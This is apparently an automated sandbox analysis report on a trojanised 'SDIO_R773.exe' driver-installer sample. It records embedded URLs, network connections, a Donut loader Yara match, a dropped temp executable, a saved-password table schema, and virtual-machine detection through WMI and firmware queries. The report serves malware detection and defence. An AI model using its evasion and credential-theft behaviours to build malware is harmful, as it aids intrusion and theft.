              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://www.dropbox.com/help
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://www.dropbox.com/home
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/js
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfj
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptc
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.co
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49749 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F860F0_3_047F860F
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F860F0_3_047F860F
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F860F0_3_047F860F
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85DE0_3_047F85DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85DE0_3_047F85DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85DE0_3_047F85DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85BD0_3_047F85BD
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85BD0_3_047F85BD
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85BD0_3_047F85BD
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F860F0_3_047F860F
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F860F0_3_047F860F
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F860F0_3_047F860F
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85DE0_3_047F85DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85DE0_3_047F85DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85DE0_3_047F85DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85BD0_3_047F85BD
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85BD0_3_047F85BD
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85BD0_3_047F85BD
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F860F0_3_047F860F
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F860F0_3_047F860F
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F860F0_3_047F860F
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85DE0_3_047F85DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85DE0_3_047F85DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85DE0_3_047F85DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85BD0_3_047F85BD
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85BD0_3_047F85BD
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85BD0_3_047F85BD
              Source: SDIO_R773.exeStatic PE information: Resource name: None type: PE32+ executable (console) x86-64, for MS Windows
              Source: SDIO_R773.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/2@12/4
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile created: C:\Users\user\AppData\Local\Temp\NOUBJXTSUL2YOW34.exeJump to behavior
              Source: SDIO_R773.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SDIO_R773.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SDIO_R773.exe, 00000000.00000003.1828826836.000000000480C000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1831331368.00000000047D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SDIO_R773.exeString found in binary or memory: -save-installed-id%temp%\SDI2\InstalledID.txt-HWIDInstalled:invalid parameter %S
              Source: SDIO_R773.exeString found in binary or memory: Fswww.snappy-driver-installer.orgopenTahomaMS Sans Serif.7zsnp%s\SDIOERROR in redrawmainwnd(): hMain is 0
              Source: SDIO_R773.exeString found in binary or memory: -PATH-install-?Install '%S' '%s'
              Source: SDIO_R773.exeString found in binary or memory: /c rd /s /q "%s"cmd-filtersp-reindex-index_hr-nogui-autoinstall-autoclose-autoupdate-nostop-extractdir:-keepunpackedindex-keeptempfiles-disableinstall-failsafe-delextrainfs-ls:-verbose:-nologfile-nosnapshot-nostamp-getdevicelist:-a:32-a:64-v:-save-installed-id-HWIDInstalled:-cfg:Unknown argument '%S'
              Source: SDIO_R773.exeString found in binary or memory: http://www.snappy-driver-installer.org/downloads/SDIO_Update.torrenthttp://www.snappy-driver-installer.org/downloads/Drivers.torrentupdate\SDIO_Update:
              Source: SDIO_R773.exeString found in binary or memory: -help
              Source: SDIO_R773.exeString found in binary or memory: ?h-helpbabdbtbbbso012bsebspyadaoasuttstxmowixaiaxanuvrstmsfxsemlscrcsisoslpscssccsltsswsscsaseaspdspespfsnhsnlsnisnssnrsncsntsdelstl$Zt&Zt(Zt.Zt1Zt4Zt7Zt
              Source: SDIO_R773.exeString found in binary or memory: Home Page: www.snappy-driver-installer.orgP
              Source: SDIO_R773.exeString found in binary or memory: Home Page: www.snappy-driver-installer.orgP"\
              Source: SDIO_R773.exeString found in binary or memory: // send updates to translations@snappy-driver-installer.org
              Source: SDIO_R773.exeString found in binary or memory: -install <hwid> <inffile>
              Source: SDIO_R773.exeString found in binary or memory: -save-installed-id[:<file>]
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile read: C:\Users\user\Desktop\SDIO_R773.exeJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: newdev.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: devrtl.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: SDIO_R773.exeStatic PE information: certificate valid
              Source: SDIO_R773.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: SDIO_R773.exeStatic file information: File size 5304144 > 1048576
              Source: SDIO_R773.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x31ce00
              Source: SDIO_R773.exeStatic PE information: section name: .eh_fram
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F4143 push eax; retf 0_3_047F4146
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F4143 push eax; retf 0_3_047F4146
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F4143 push eax; retf 0_3_047F4146
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F8A24 push esi; retf 0_3_047F8A27
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F8A24 push esi; retf 0_3_047F8A27
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F8A24 push esi; retf 0_3_047F8A27
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F491C push 8FBE3A3Fh; ret 0_3_047F4921
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F491C push 8FBE3A3Fh; ret 0_3_047F4921
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F491C push 8FBE3A3Fh; ret 0_3_047F4921
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F48CB pushad ; retf 0_3_047F48DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F48CB pushad ; retf 0_3_047F48DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F48CB pushad ; retf 0_3_047F48DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F80AC push esi; retf 0_3_047F80AF
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F80AC push esi; retf 0_3_047F80AF
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F80AC push esi; retf 0_3_047F80AF
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047DB9A2 push edx; retf 0_3_047DB9A6
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047E1E9F push ds; retf 0_3_047E1ED2
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047E1E9F push ds; retf 0_3_047E1ED2
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047E0199 push esi; iretd 0_3_047E019A
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047E0199 push esi; iretd 0_3_047E019A
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047E328D push eax; retf 0_3_047E328E
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047E328D push eax; retf 0_3_047E328E
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F4143 push eax; retf 0_3_047F4146
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F4143 push eax; retf 0_3_047F4146
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F4143 push eax; retf 0_3_047F4146
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F8A24 push esi; retf 0_3_047F8A27
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F8A24 push esi; retf 0_3_047F8A27
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F8A24 push esi; retf 0_3_047F8A27
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F491C push 8FBE3A3Fh; ret 0_3_047F4921
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F491C push 8FBE3A3Fh; ret 0_3_047F4921
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F491C push 8FBE3A3Fh; ret 0_3_047F4921
              Source: C:\Users\user\Desktop\SDIO_R773.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\SDIO_R773.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\SDIO_R773.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exe TID: 7656Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Amcache.hve.0.drBinary or memory string: VMware
              Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2066797770.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.0.drBinary or memory string: vmci.sys
              Source: Amcache.hve.0.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.0.drBinary or memory string: VMware20,1
              Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
